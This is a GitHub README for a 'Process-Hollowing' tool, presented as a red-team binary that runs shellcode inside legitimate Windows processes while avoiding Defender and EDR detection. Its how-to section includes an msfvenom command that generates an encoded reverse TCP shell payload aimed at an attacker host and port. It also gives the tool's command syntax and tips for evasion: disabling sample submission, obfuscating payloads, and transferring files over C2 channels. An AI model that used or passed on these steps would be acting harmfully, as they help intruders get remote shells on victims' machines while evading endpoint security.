Skip to content

vatsalgupta67/Process-Hollowing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

93 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Process-Hollowing

Red Team Operation's Defense Evasion Technique for executing payload without raising flags on Target System.

Kindly read How To Use !! - This is a Defense Evasion Technique so with time we add some suggestions for Red Team Ops to fulfill their primary objectives, so you can work Smoothly !!

Warning

This Binary made for Red Team Operations and user is only be responsible for the use, There's no liability of the Owner.

Made With ❤️ in 🇮🇳!!!

Credit of these Images goes to their respective creators ☺️!!

hollowing1-1_

491809_1_En_10_Fig27_HTML

90540-1sncmwnz19drbfqzllk_d5w

We have both x86 and x64 bit release as you want. we strongly suggest x64-bit release if you're confused about compiling manually.

We suggest to use directly compiled executables as in some situations it depends on your compiler functionality. Both executables are stable and tested several times.

If you wish to Compile x64 bit relese on Kali with cross-compiler - x86_64-w64-mingw32-gcc.

For 32-bit - Mingw for Windows.

Index

Tools Resources and skills used

  1. ChatGPT for researching about required Windows API and functionality.

  2. Visual Studio Code - Linux and Windows.

  3. Cross-compiler.

  4. Process-Hollowing Technique working.

  5. Deep-imagination .

  6. Error-handling.

  7. Programming Skills.

  8. Time.

  9. Defeating Failures.

  10. Tons of Research.

  11. Dedication.

  12. Smart Work.

Demo

windows-hollow

kali

win-update

firewall

windef-2

windows-def

⚠️How to use

Note

Sometimes you have to Re-run the program because of Memory Issues. But do not worry, You'll get the shell on Re-run !!! 🧿

Recommended to Turn-Off "Automatic Sample Submission" If you can or using in the testing environment.

1. Generate a .bin file only - You can use C2 servers and metasploit too or any you want

Example - msfvenom -p windows/x64/shell_reverse_tcp LHOST=< IP > LPORT=< PORT > -f raw -i < iterations as you want for evasion > -e < encoder you want to use > -o shell.bin - x64-Bit

2. Obfuscation is mainly depends your work to do as per your operation's requirement and the other things? - WE'LL HANDLE!!!

3. Transfer Both Payload and Binary to Target System.

4. Hollow64.exe < Path to Any application to run or show as example -notepad.exe, calc.exe > < Path to Shellcode file > . - You can refer to above demonstration images and binary itself to understand also .

5. Execute, But remember .bin files can evade better as per my Personal Experience so, just make your Payload Obfuscated for better Defense Evasion.

6. After Execution, Payload will be run as your specified genuine windows executable ( system32's too ).

7. If you're injecting to custom binary - It might fails due to Memory allocation issue , still depends on your Privilege and many 3rd level factors. But you can give it a try - In some cases it will work !! 🧿

8. As we know EDR's and AV signatures keep updating, so we created an obfuscated release to assist you and have tested on the Latest Updated Windows . !!!

Important

⚠️Keep few things in mind when using obfuscated release -

  • Never Directly Download Executable via Github on the target system, I found some bytes were missing - Technical Issue + WindowsSmartScreen even mark genuine executables malicious too while downloading .EXE from Github. ( That's why Non-Malicious like WinPEAs , which is for PrivEsc too faces some windowsSmartScreen blockings )

  • Best way is to Download from Github to your Kali Linux or any Attacker Machine first and then transfer it to Target System via C2 Channels or any you like. ( Invoke-WebRequest too )

  • In this case you'll not face any problems regarding missing bytes or EDR.

  • Sometimes you have to apply many other ways to Bypass EDR and there's not always be a Signature-Patch issue. But there might be a Feature or some Technical problems like missing bytes of the binary, which restricting us.